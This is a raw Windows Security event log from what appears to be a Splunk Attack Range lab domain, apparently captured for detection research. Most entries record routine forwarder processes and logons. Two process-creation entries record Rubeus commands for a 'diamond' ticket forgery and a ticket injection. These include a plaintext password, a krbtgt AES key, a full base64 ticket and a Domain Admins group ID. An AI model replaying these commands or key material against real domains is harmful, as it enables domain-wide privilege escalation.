4689001331300x8020000000000000395289Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x2acC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 4688201331200x8020000000000000395288Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x2acC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000395287Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10xfc0C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 4688201331200x8020000000000000395286Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70xfc0C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000395285Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10xca8C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 4688201331200x8020000000000000395284Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70xca8C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000395283Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x10x1148C:\Windows\System32\backgroundTaskHost.exe 4634001254500x8020000000000000186264Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1094df23 4627001255400x8020000000000000186263Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x1094df2311 BUILTIN\Administrators Everyone BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Users BUILTIN\Windows Authorization Access Group NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\AR-WIN-DC$ %{S-1-5-21-2442966654-584408786-1775486684-516} NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Authentication authority asserted identity ATTACKRANGE\Denied RODC Password Replication Group Mandatory Label\System Mandatory Level 4624201254400x8020000000000000186262Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x1094df23KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251160%%1833---%%18430x0%%1842 4672001254800x8020000000000000186261Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1094df2SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4627001255400x8020000000000000186260Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-21-2442966654-584408786-1775486684-1115lowprivATTACKRANGE.LOCAL0x1094dbc311 ATTACKRANGE\Domain Users %{S-1-1-0} %{S-1-5-32-545} BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Administrators NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\Domain Admins %{S-1-18-1} %{S-1-5-21-2442966654-584408786-1775486684-572} Mandatory Label\High Mandatory Level 4624201254400x8020000000000000186259Securityar-win-dc.attackrange.localNULL SID--0x0ATTACKRANGE\lowprivlowprivATTACKRANGE.LOCAL0x1094dbc3KerberosKerberos-{419b296a-b261-dfbf-4061-566b1c9ac331}--00x0-10.0.1.1550067%%1840---%%18430x0%%1842 4672001254800x8020000000000000186258Securityar-win-dc.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x1094dbcSeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4689001331300x8020000000000000395282Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x00x10acC:\Rubeus.exe 4688201331200x8020000000000000395281Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x10acC:\Rubeus.exe%%19380x1258Rubeus.exe asktgs /service:cifs/ar-win-dc.attackrange.local /nowrap /ptt /ticket:doIFzjCCBcqgAwIBBaEDAgEWooIExTCCBMFhggS9MIIEuaADAgEFoRMbEUFUVEFDS1JBTkdFLkxPQ0FMoiYwJKADAgECoR0wGxsGa3JidGd0GxFBVFRBQ0tSQU5HRS5MT0NBTKOCBHMwggRvoAMCARKhAwIBA6KCBGEEggRdyjNAgvhKJRdijZX3haYHnUCqO/GmABqUotkmCBsdwF7zHdlzeosUkNDNzKdy0LS7mkN9PS+YiVOBG0rzpArZPlmoWB5whBJXYf9phZqv+yAt23hbgeTg2ZxxsFQPWhO6HKQYdAjGp20RM2pOlJEzk9MAohkT6yXMUT4yVYzIYyoy68kdmveYqEVoDhJkGHzmM8dDMJuhjLxSqPcgUxHcSWCWXo1IvpoesDAXcsQgnPFlCjqDDPeFaDktrxueXcf5kZo+E2+01NBPY1yvWkKuxeXWfHWuCa6Zc/hRynVWafkGNUWH1xC3NgHLFSpU4HLZyyJ3UJDQ9rzgGDXmjO5MeBctTUqM5a4wiRggYz4odQ14elIRoICWILFOp2U/+7hp8Vhg2rfIh01+8hRYEzcISuvI7YRf2XgxA9ZvSrwWRJjxIIDQS/zfhJkUwMcTU2c/89meYuj93jznrvvu4EzMWsZRqbWy1lCT5PftDp9tEf+iugABbIb0jGZvVBpQ6+hX0rlvB3Gba20jaFXLoJD32rDSbP+c1UGg5OksxaOyVcgvDbnprEdxuoRII5tizM6UWT6RsI5CKZbfLG8AtPz+cWZFz0h7g64qIOj0WYtfg++2bi3bylHnklJ4llxXm1yrlcPk1CY2zaUNXF+8aoh5NLCC1hNp2g0X8C6m5Q/eeMJetiApqB9vrK0I/uk8Fdg3dBx4J/IBWA/xg6olTr7Isi+lGRjx1rVBVTOhAWjDJWha9GH/EVif8+FDL8MOV+dG5dQlepdr3QuGPg7QOhBmWGs1JuzPBUoIO8171wn7cn0i+wQSaAhQpMTMWkfWeKiDZfreLXDvwk8YlGGcQlyA2H45HhcrjtDMAp2nDISNtQ23qlLABzMpJgfqE1XkAG1IyVpj4d+hli+2tXz7CnM0p0yx9vOZa1FZ+gyxT4xWd2Csr5KRwctdzdDJLVdYzUxBL/Z+L6FweXNzDZOeKCGPKSDIBZ6dX8Y/+FukTguAiwf/5EBwLvj3qxIwrqbIcPCdXE1fadk52+b0S6t4dxTVwtAYREG6lYPh1Dxx8XkAPbEkyUz80wlRj8MENC3PrX3CahhBWLQGCB96lVvxm9Gs+AmWV+QcH34qD0aOyzEi5Mz1WlXZX6npvocIGFHrICSyh1DpbjmO7y+HOKEssqZZzHXTzZbZYEqJFEY8P5MHSPdJDtl3L/2COwD+xZutNEplQL3uQgAhZvECXjt2uWbs+3bO7xZRy3py6GTlfqLLGZYAEJLlcy0QMFbiP36a0FjQlq8mZV2ugkJGYm5ENuaBpuWNgzhX1fbq+rjPpbV4JlJ4BHly3KFYJuicjNYz5LZ5Sa3uG4PfhVDh9hfRP3gMopEPn+Uwr95yUxaxkOOen52MEL0ckLB2wPcUnqYlKlRwLakDknSh+Kop7pHbh7Mow6d+2yxTy8zRrDF/6zw4FD99xymZJqb6lIHj2PWSQ5WaWDbBxWmSoJuf+3NviaOB9DCB8aADAgEAooHpBIHmfYHjMIHgoIHdMIHaMIHXoCswKaADAgESoSIEIBxsUpqIBnBJtV4abnwMztfcvKxnGo6EgkCMgpigGnFjoRMbEUFUVEFDS1JBTkdFLkxPQ0FMohQwEqADAgEBoQswCRsHbG93cHJpdqMHAwUAQOEAAKURGA8yMDIzMTAwNTIwMDIyNlqmERgPMjAyMzEwMDYwNjAyMjZapxEYDzIwMjMxMDEyMjAwMjI2WqgTGxFBVFRBQ0tSQU5HRS5MT0NBTKkmMCSgAwIBAqEdMBsbBmtyYnRndBsRQVRUQUNLUkFOR0UuTE9DQUw=NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\Medium Mandatory Level 4769001433700x8020000000000000186257Securityar-win-dc.attackrange.locallowpriv@ATTACKRANGE.LOCALATTACKRANGE.LOCALAR-WIN-DC$ATTACKRANGE\AR-WIN-DC$0x408000100x12::ffff:10.0.1.15500660x0{e226f66b-8ab3-54c1-f256-91039235f362}- 4634001254500x8020000000000000395280Securityar-win-2.attackrange.localATTACKRANGE\lowpriv2lowpriv2ATTACKRANGE0x96ba382 4634001254500x8020000000000000186256Securityar-win-dc.attackrange.localATTACKRANGE\lowpriv2lowpriv2ATTACKRANGE0x108e8613 4768001433900x8020000000000000186255Securityar-win-dc.attackrange.locallowprivattackrange.localATTACKRANGE\lowprivkrbtgtATTACKRANGE\krbtgt0x408100100x00x122::ffff:10.0.1.1550065 4689001331300x8020000000000000395279Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x00x184C:\Rubeus.exe 4688201331200x8020000000000000395278Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x184C:\Rubeus.exe%%19380x1258Rubeus.exe diamond /user:lowpriv /password:MPW2tGC7Eo7Jaral2qc /krbkey:8b605a4af251f69318fb5c23833f28a70dae789098f7be9ab59799975cab8f30 /enctype:aes /domain:attackrange.local /ticketuser:lowpriv /ticketuserid:1115 /groups:512 /nowrapNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\Medium Mandatory Level 4634001254500x8020000000000000186254Securityar-win-dc.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x10941033 4689001331300x8020000000000000395277Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10xfe0C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 4688201331200x8020000000000000395276Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70xfe0C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000395275Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x13e0C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 4688201331200x8020000000000000395274Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x13e0C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4634001254500x8020000000000000186253Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109418f3 4627001255400x8020000000000000186252Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x109418f311 BUILTIN\Administrators Everyone BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Users BUILTIN\Windows Authorization Access Group NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\AR-WIN-DC$ %{S-1-5-21-2442966654-584408786-1775486684-516} NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Authentication authority asserted identity ATTACKRANGE\Denied RODC Password Replication Group Mandatory Label\System Mandatory Level 4624201254400x8020000000000000186251Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x109418f3KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251159%%1833---%%18430x0%%1842 4672001254800x8020000000000000186250Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109418fSeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4634001254500x8020000000000000186249Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109414e3 4627001255400x8020000000000000186248Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x109414e311 BUILTIN\Administrators Everyone BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Users BUILTIN\Windows Authorization Access Group NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\AR-WIN-DC$ %{S-1-5-21-2442966654-584408786-1775486684-516} NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Authentication authority asserted identity ATTACKRANGE\Denied RODC Password Replication Group Mandatory Label\System Mandatory Level 4624201254400x8020000000000000186247Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x109414e3KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251158%%1833---%%18430x0%%1842 4672001254800x8020000000000000186246Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109414eSeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4627001255400x8020000000000000186245Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-21-2442966654-584408786-1775486684-1115lowprivATTACKRANGE.LOCAL0x1094103311 ATTACKRANGE\Domain Users %{S-1-1-0} %{S-1-5-32-545} BUILTIN\Pre-Windows 2000 Compatible Access NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization Authentication authority asserted identity Mandatory Label\Medium Plus Mandatory Level 4624201254400x8020000000000000186244Securityar-win-dc.attackrange.localNULL SID--0x0ATTACKRANGE\lowprivlowprivATTACKRANGE.LOCAL0x10941033KerberosKerberos-{d6f31c8f-91b0-52da-9059-3bb4668acbd0}--00x0-10.0.1.1550059%%1840---%%18430x0%%1842 4769001433700x8020000000000000186243Securityar-win-dc.attackrange.locallowpriv@ATTACKRANGE.LOCALATTACKRANGE.LOCALkrbtgtATTACKRANGE\krbtgt0x608100100x12::ffff:10.0.1.15500630x0{08f5e3f5-fbac-168a-844a-51e7bbe9267d}- 4769001433700x8020000000000000186242Securityar-win-dc.attackrange.locallowpriv@ATTACKRANGE.LOCALATTACKRANGE.LOCALAR-WIN-DC$ATTACKRANGE\AR-WIN-DC$0x408100000x12::ffff:10.0.1.15500620x0{08f5e3f5-fbac-168a-844a-51e7bbe9267d}- 4768001433900x8020000000000000186241Securityar-win-dc.attackrange.locallowprivATTACKRANGE.LOCALATTACKRANGE\lowprivkrbtgtATTACKRANGE\krbtgt0x408100100x00x122::ffff:10.0.1.1550061 4634001254500x8020000000000000186240Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10940603 4627001255400x8020000000000000186239Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x1094060311 BUILTIN\Administrators Everyone BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Users BUILTIN\Windows Authorization Access Group NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\AR-WIN-DC$ %{S-1-5-21-2442966654-584408786-1775486684-516} NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Authentication authority asserted identity ATTACKRANGE\Denied RODC Password Replication Group Mandatory Label\System Mandatory Level 4624201254400x8020000000000000186238Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x10940603KerberosKerberos-{5d2976c3-f935-4dd0-6523-aa10b5a0ab92}--00x0-::151157%%1833---%%18430x0%%1842 4672001254800x8020000000000000186237Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1094060SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4689001331300x8020000000000000186236Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10xd28C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 4688201331200x8020000000000000186235Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70xd28C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000186234Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10x1178C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 4688201331200x8020000000000000186233Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x1178C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000186232Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10x5f0C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 4688201331200x8020000000000000186231Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x5f0C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000186230Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10xbb4C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 4688201331200x8020000000000000186229Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70xbb4C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000186228Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10x4c4C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 4688201331200x8020000000000000186227Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x4c4C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4634001254500x8020000000000000186226Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10913463 4689001331300x8020000000000000395273Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x1330C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 4688201331200x8020000000000000395272Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x1330C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000395271Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x1300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 4688201331200x8020000000000000395270Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x1300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4689001331300x8020000000000000395269Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x12e4C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 4688201331200x8020000000000000395268Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x12e4C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level 4634001254500x8020000000000000186225Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10911633 4634001254500x8020000000000000186224Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109126d3 4634001254500x8020000000000000186223Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10912bc3 4627001255400x8020000000000000186222Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x1091346311 BUILTIN\Administrators Everyone BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Users BUILTIN\Windows Authorization Access Group NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\AR-WIN-DC$ %{S-1-5-21-2442966654-584408786-1775486684-516} NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Authentication authority asserted identity ATTACKRANGE\Denied RODC Password Replication Group Mandatory Label\System Mandatory Level 4624201254400x8020000000000000186221Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x10913463KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251156%%1840---%%18430x0%%1842 4672001254800x8020000000000000186220Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1091346SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4627001255400x8020000000000000186219Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x10912bc311 BUILTIN\Administrators Everyone BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Users BUILTIN\Windows Authorization Access Group NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\AR-WIN-DC$ %{S-1-5-21-2442966654-584408786-1775486684-516} NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Authentication authority asserted identity ATTACKRANGE\Denied RODC Password Replication Group Mandatory Label\System Mandatory Level 4624201254400x8020000000000000186218Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x10912bc3KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-10.0.1.1451155%%1833---%%18430x0%%1842 4672001254800x8020000000000000186217Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10912bcSeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4627001255400x8020000000000000186216Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x109126d311 BUILTIN\Administrators Everyone BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Users BUILTIN\Windows Authorization Access Group NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\AR-WIN-DC$ %{S-1-5-21-2442966654-584408786-1775486684-516} NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Authentication authority asserted identity ATTACKRANGE\Denied RODC Password Replication Group Mandatory Label\System Mandatory Level 4624201254400x8020000000000000186215Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x109126d3KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-::10%%1833---%%18430x0%%1842 4672001254800x8020000000000000186214Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109126dSeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4627001255400x8020000000000000186213Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x1091163311 BUILTIN\Administrators Everyone BUILTIN\Pre-Windows 2000 Compatible Access BUILTIN\Users BUILTIN\Windows Authorization Access Group NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization ATTACKRANGE\AR-WIN-DC$ %{S-1-5-21-2442966654-584408786-1775486684-516} NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Authentication authority asserted identity ATTACKRANGE\Denied RODC Password Replication Group Mandatory Label\System Mandatory Level 4624201254400x8020000000000000186212Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x10911633KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251154%%1833---%%18430x0%%1842 4672001254800x8020000000000000186211Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1091163SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege 4688201331200x8020000000000000395267Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x1268C:\Windows\System32\conhost.exe%%19380x1258\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\Medium Mandatory Level 4688201331200x8020000000000000395266Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x1258C:\Windows\System32\cmd.exe%%19380xda0"C:\Windows\system32\cmd.exe" NULL SID--0x0C:\Windows\explorer.exeMandatory Label\Medium Mandatory Level 4689001331300x8020000000000000395265Securityar-win-2.attackrange.localATTACKRANGE\lowpriv2lowpriv2ATTACKRANGE0x96ba380x00x528C:\Windows\System32\conhost.exe 